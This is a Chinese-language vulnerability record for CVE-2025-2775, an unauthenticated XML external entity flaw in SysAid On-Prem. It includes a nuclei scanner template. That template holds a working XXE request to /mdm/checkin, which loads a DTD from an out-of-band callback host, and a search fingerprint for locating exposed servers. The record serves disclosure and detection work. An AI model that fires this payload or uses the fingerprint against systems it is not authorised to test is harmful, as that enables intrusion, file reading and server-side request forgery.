漏洞信息
漏洞名称: SysAid On-Prem XML External Entity Vulnerability
漏洞编号:
漏洞类型: XML实体注入
漏洞等级: 严重
漏洞描述: SysAid On-Prem是一款广泛使用的IT服务管理软件,适用于企业级服务管理,提供IT支持、资产管理等功能,通常部署在企业内部网络中。该软件的版本23.3.40及之前版本存在一个未认证的XML外部实体(XXE)漏洞,位于Checkin处理功能中。此漏洞的技术根源在于对XML输入的不当处理,允许攻击者通过构造恶意的XML实体来读取文件内容或执行服务器端请求伪造(SSRF)攻击,进而可能导致管理员账户被接管。由于该漏洞无需认证即可利用,攻击者可以远程发起攻击,对受影响系统造成严重影响,包括敏感数据泄露和服务中断。此漏洞的CVSS评分为9.3,属于严重级别,已被列入已知被利用漏洞(KEV)目录,因此需要立即修补以防止潜在的大规模攻击。
产品厂商: sysaid
产品名称: SysAid On-Prem
影响版本: <= 23.3.40
搜索语法: http.favicon.hash:”1540720428” OR icon_hash=1540720428
来源: https://github.com/projectdiscovery/nuclei-templates/blob/01a59299771e9178d0aadf2065d772c10e58fac8/http%2Fcves%2F2025%2FCVE-2025-2775.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54
| id: CVE-2025-2775
info: name: SysAid On-Prem <= 23.3.40 - XML External Entity author: johnk3r severity: critical description: | SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Checkin processing functionality, allowing for administrator account takeover and file read primitives. reference: - https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/ - https://documentation.sysaid.com/docs/24-40-60 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L cvss-score: 9.3 cve-id: CVE-2025-2775 cwe-id: CWE-611 metadata: max-request: 1 vendor: sysaid product: sysaid shodan-query: http.favicon.hash:"1540720428" fofa-query: icon_hash=1540720428 tags: cve,cve2025,oast,sysaid,xxe,kev
variables: filename: "{{to_lower(rand_text_alpha(5))}}"
http: - raw: - | POST /mdm/checkin HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml
<?xml version="1.0" ?> <!DOCTYPE foo [ <!ENTITY % foo SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd"> %foo; ]>
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http"
- type: word part: interactsh_request words: - "User-Agent: Java" # digest: 4b0a00483046022100a663cc73b992dc990d74eefc3c09fd70452f44d25e376b57aa74006e5c74ff10022100f485e0461d196c6b9c2570c331cb47900c2367c14b6849b1a44057d6e7e4b7cd:922c64590222798bb761d5b6d8e72950
|